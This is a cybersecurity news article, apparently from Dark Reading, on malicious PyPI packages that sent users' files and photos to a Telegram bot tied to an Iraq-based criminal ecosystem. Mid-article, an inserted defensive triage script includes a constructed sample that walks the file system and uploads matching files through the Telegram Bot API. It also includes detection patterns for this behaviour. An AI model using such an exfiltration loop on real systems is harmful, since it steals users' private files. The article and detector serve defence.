
Well-Established Cybercriminal Ecosystem Blooming in Iraq

A malicious Telegram bot is the key to a veritable flourishing garden of nefarious cybercriminal activity, which was discovered via a series of Python packages.

Leonardslee garden in full bloom, Sussex UK
Source: Picturebank via Alamy Stock Photo

A sprawling criminal network has emerged in Iraq, linked to a Telegram bot that dates back to 2022 and contains more than 90,000 messages, mostly in Arabic.

According to researchers at Checkmarx, the bot is the key to a larger, sophisticated cybercriminal ecosystem, including a thriving underground marketplace offering social media manipulation services and financial theft tools, and a suite of malicious PyPI packages that exfiltrate user data.

Malicious PyPI Packages for Data Theft

A series of malicious, Arabic-language Python packages recently surfaced on the Python code repository PyPI, according to Checkmarx, uploaded by a user named "dsfsdfds." Upon further examination, the researchers found them to contain a malicious script that was pilfering sensitive user data out to a Telegram bot chat.

"The malicious script … begins by scanning the user's file system, focusing on two specific locations: the root folder and the DCIM folder," according to the report, released today. "During this scanning process, the script searches for files with extensions such as .py, .php, and .zip files, as well as photos with .png, .jpg, and .jpeg extensions."

The packages also contained a hardcoded Telegram ID and token, which Checkmarx researchers used to gain direct access to the attacker's Telegram bot, where they discovered "a significant history of activity, with records dating back to at least 2022, long before the malicious packages were released on PyPI."
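The behaviour described above gives a defender concrete static indicators to look for in a package before it is installed: a hardcoded Telegram bot token and chat ID, calls to the Telegram Bot API, and a file-system sweep keyed on the extensions and the DCIM folder the report lists. The following triage script is an added example, not Checkmarx's tooling and not code from the "dsfsdfds" packages. The package contents it scans are constructed inline, and the token in them is a placeholder with the right shape (bot id, colon, 35 token characters), not a real credential.

```python
"""Static triage of a Python package for the indicators the Checkmarx report
describes. Added example: the SAMPLE_PACKAGE below is constructed, not the
real packages, and the token in it is a placeholder, not a live credential."""
import re
from typing import Dict, List

# Telegram bot tokens have the shape "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# Bot API requests go to api.telegram.org/bot<token>/<method>.
API_RE = re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)
# Extensions the report says the script hunted for.
TARGET_EXTS = (".py", ".php", ".zip", ".png", ".jpg", ".jpeg")
# Directories the report says it walked (DCIM is where phones keep photos).
TARGET_DIRS = ("DCIM",)

# Constructed sample: one file mimicking the reported pattern, one benign file.
SAMPLE_PACKAGE: Dict[str, str] = {
    "badpkg/__init__.py": '''
import os, requests
TOKEN = "1234567890:AAEconstructedExampleTokenValue0000"  # constructed placeholder
CHAT_ID = "000000000"
EXTS = (".py", ".php", ".zip", ".png", ".jpg", ".jpeg")
for root in ("/", os.path.expanduser("~/DCIM")):
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith(EXTS):
                requests.post(f"https://api.telegram.org/bot{TOKEN}/sendDocument", ...)
''',
    "goodpkg/util.py": '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
''',
}


def triage_source(name: str, source: str) -> Dict[str, List[str]]:
    """Map each indicator found in one source file to the 'file:line' locations."""
    findings: Dict[str, List[str]] = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        where = f"{name}:{lineno}"
        if TOKEN_RE.search(line):
            findings.setdefault("hardcoded_telegram_token", []).append(where)
        if API_RE.search(line):
            findings.setdefault("telegram_bot_api_call", []).append(where)
        if "os.walk" in line or "rglob" in line:
            findings.setdefault("filesystem_walk", []).append(where)
        # Three or more of the targeted extensions on one line is a collection list.
        if sum(1 for ext in TARGET_EXTS if ext in line) >= 3:
            findings.setdefault("target_extension_list", []).append(where)
        if any(d in line for d in TARGET_DIRS):
            findings.setdefault("target_directory", []).append(where)
    return findings


def triage_package(files: Dict[str, str]) -> Dict[str, dict]:
    """Flag a file as suspicious only when an exfiltration channel (token or Bot
    API call) appears together with a collection indicator (walk, extension list,
    or targeted directory); either alone is weak evidence on its own."""
    report: Dict[str, dict] = {}
    for name, src in files.items():
        found = triage_source(name, src)
        channel = {"hardcoded_telegram_token", "telegram_bot_api_call"} & found.keys()
        collection = {"filesystem_walk", "target_extension_list", "target_directory"} & found.keys()
        report[name] = {"indicators": found, "suspicious": bool(channel and collection)}
    return report


if __name__ == "__main__":
    for fname, result in triage_package(SAMPLE_PACKAGE).items():
        flag = "SUSPICIOUS" if result["suspicious"] else "clean"
        print(f"{fname}: {flag} {sorted(result['indicators'])}")
```

Requiring both a channel and a collection indicator keeps a single Telegram URL in a legitimate notification library from being flagged on its own; the per-line locations let a reviewer confirm each hit by hand before blocking the package.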

Ultimately, the 90,000 messages pointed to an origin in Iraq, with ties to many other bots to boot. In all, it's clear that Iraq is home to a heretofore unknown, thriving cybercriminal enterprise with a raft of illicit services on offer.

"The discovery of the malicious Python packages on PyPI and the subsequent investigation into the Telegram bot have shed light on a sophisticated and widespread cybercriminal operation," the report concluded. "What initially appeared to be an isolated incident of malicious packages turned out to be just the tip of the iceberg, revealing a well-established criminal ecosystem based in Iraq."

The discovery underscores the continuing role of open source software as an attack vector for compromising enterprise information, the researchers noted, adding that they plan to release further details on the Iraq underground discovery in the coming months.

"As the fight against malicious actors in the open-source ecosystem persists, collaboration and information sharing among the security community will be critical in identifying and thwarting these attacks," they said. "Through collective effort and proactive measures, we can work towards a safer and more secure open-source ecosystem for all."

About the Author

Tara Seals, Managing Editor, News, Dark Reading

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

